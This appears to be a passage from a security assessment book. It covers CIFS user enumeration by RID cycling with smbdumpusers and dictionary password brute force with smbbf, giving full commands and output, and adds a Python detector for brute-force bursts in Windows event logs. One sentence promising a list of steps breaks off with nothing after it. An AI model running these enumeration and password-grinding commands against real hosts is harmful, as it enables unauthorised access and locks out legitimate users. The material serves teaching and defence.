The Common Internet File System (CIFS) is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility. Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).

9.6.1 CIFS Enumeration

In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job. The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Win32 executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.

9.6.1.1 User enumeration through smbdumpusers

The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is the way the utility can enumerate users through a direct dump that works with RestrictAnonymous=0, but also using the RID cycling technique that can evade RestrictAnonymous=1 settings by attempting to reverse each ID value to a username. Example 9-20 shows the usage and command-line options for smbdumpusers.

Example 9-20. smbdumpusers usage and command-line options

    D:\smb-at> smbdumpusers
    SMB - DumpUsers V1.0.4 by (patrik.karlsson@ixsecurity.com)
    -------------------------------------------------------------------
    usage: smbdumpusers -i <ipaddress|ipfile> [options]

      -i*  IP or <filename> of server[s] to bruteforce
      -m   Specify which mode
             1 Dumpusers (Works with restrictanonymous=0)
             2 SidToUser (Works with restrictanonymous=0|1)
      -f   Filter output
             0 Default (Filter Machine Accounts)
             1 Show All
      -e   Amount of sids to enumerate
      -E   Amount of sid mismatches before aborting mode 2
      -n   Start at SID
      -s   Name of the server to bruteforce
      -r   Report to <ip>.txt
      -t   timeout for connect (default 300ms)
      -v   Be verbose
      -P   Protocol version
             0 - Netbios Mode
             1 - Windows 2000 Native Mode

Example 9-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 9-3) through CIFS.

Example 9-21. Cycling RID values to find usernames with smbdumpusers

    D:\smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1
    500-Administrator
    501-Guest
    513-None
    1000-__vmware__
    1001-__vmware_user__
    1002-VUSR_OSG-SERV
    1003-mickey

9.6.2 CIFS Brute Force

The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 9-22 shows the smbbf usage.

Example 9-22. smbbf usage and command-line options

    D:\smb-at> smbbf
    SMB - Bruteforcer V1.0.4 by (patrik.karlsson@ixsecurity.com)
    --------------------------------------------------------------
    usage: smbbf -i [options]

      -i*  IP address of server to bruteforce
      -p   Path to file containing passwords
      -u   Path to file containing users
      -s   Server to bruteforce
      -r   Path to report file
      -t   timeout for connect (default 300ms)
      -w   Workgroup/Domain
      -g   Be nice, automaticaly detect account lockouts
      -v   Be verbose
      -P   Protocol version
             0 - Netbios Mode
             1 - Windows 2000 Native Mode

To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 9-23.

Example 9-23. Using smbbf against the CIFS service

    D:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
    INFO: Could not determine server name ...
    -- Starting password analysis on 192.168.189.1 --
    Logging in as Administrator with secret on WIDGETS
    Access denied
    Logging in as Administrator with qwerty on WIDGETS
    Access denied
    Logging in as Administrator with letmein on WIDGETS
    Access denied
    Logging in as Administrator with password on WIDGETS
    Access denied
    Logging in as Administrator with abc123 on WIDGETS
    Access denied

The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second. If smbbf is run with only an IP address specified, it does the following:

The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.
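A password-grinding run like the one in Example 9-23 is noisy from the target's point of view: at hundreds of attempts per second, every attempt lands in the Security log as a failed logon, and if lockout policy is enabled (the reason smbbf offers -g) the grinder also starts locking out real accounts. The detector below is an added defensive example, not part of this chapter or of the SMB-AT toolkit. It reads a constructed, simplified export format (timestamp, event ID, target account, source address) rather than a real Windows event export, and uses the Windows Security event IDs 4625 (failed logon) and 4740 (account locked out) as the failure and lockout markers; on the Windows 2000/2003 hosts this chapter discusses the legacy equivalents are 529 and 644, which can be substituted via the two constants. It flags any source address that produces a burst of failures within a sliding window, and lists the accounts that source touched and any that were locked out as a result.

```python
"""Detect SMB/CIFS password grinding from exported Windows Security events.

Added defensive example (not from the chapter or SMB-AT). The input format is
a constructed simplification: one event per line, fields separated by spaces:
  <ISO timestamp> <event id> <target account> <source address>
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625     # legacy Windows 2000/2003 equivalent: 529
ACCOUNT_LOCKOUT = 4740  # legacy Windows 2000/2003 equivalent: 644

FAIL_THRESHOLD = 5            # failures from one source inside WINDOW -> alert
WINDOW = timedelta(seconds=60)

# Constructed sample log: a grinder at 192.168.189.50 hammers two accounts
# and locks one out; 10.0.0.7 is a user mistyping a password twice, an hour apart.
SAMPLE_LOG = """\
2004-03-01T10:00:00 4625 Administrator 192.168.189.50
2004-03-01T10:00:00 4625 Administrator 192.168.189.50
2004-03-01T10:00:00 4625 Administrator 192.168.189.50
2004-03-01T10:00:01 4625 Administrator 192.168.189.50
2004-03-01T10:00:01 4625 Administrator 192.168.189.50
2004-03-01T10:00:01 4625 Administrator 192.168.189.50
2004-03-01T10:00:02 4625 mickey 192.168.189.50
2004-03-01T10:00:02 4625 mickey 192.168.189.50
2004-03-01T10:00:02 4625 mickey 192.168.189.50
2004-03-01T10:00:02 4625 mickey 192.168.189.50
2004-03-01T10:00:03 4740 mickey 192.168.189.50
2004-03-01T10:05:00 4625 Guest 10.0.0.7
2004-03-01T11:00:00 4625 Guest 10.0.0.7
"""


def parse_events(text):
    """Parse the constructed line format into (timestamp, event_id, account, source)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, source = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), account, source))
    return events


def detect_grinding(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return {source: details} for every source whose failed logons, counted
    over any sliding window of length `window`, reach `threshold`.

    details = peak failure count in one window, accounts attempted, accounts
    that this source drove into lockout.
    """
    failures = defaultdict(list)   # source -> [(timestamp, account), ...] in time order
    lockouts = defaultdict(set)    # source -> {account, ...}
    for ts, event_id, account, source in sorted(events):
        if event_id == FAILED_LOGON:
            failures[source].append((ts, account))
        elif event_id == ACCOUNT_LOCKOUT:
            lockouts[source].add(account)

    alerts = {}
    for source, fails in failures.items():
        # Two-pointer sliding window over the time-sorted failure list.
        start = 0
        peak = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[source] = {
                "peak_failures_in_window": peak,
                "accounts": sorted({account for _, account in fails}),
                "lockouts": sorted(lockouts.get(source, set())),
            }
    return alerts


if __name__ == "__main__":
    for source, details in detect_grinding(parse_events(SAMPLE_LOG)).items():
        print(f"{source}: {details['peak_failures_in_window']} failures in "
              f"{WINDOW.seconds}s across {details['accounts']}, "
              f"locked out: {details['lockouts'] or 'none'}")
```

On the sample data only 192.168.189.50 is reported (ten failures inside two seconds, against Administrator and mickey, with mickey locked out); the two Guest failures an hour apart from 10.0.0.7 never exceed one per window. The threshold is deliberately low for the sample; in practice it is tuned against the site's own baseline, and the lockout list is the part worth paging on, since a grinder that trips lockout policy is denying service to legitimate users as a side effect.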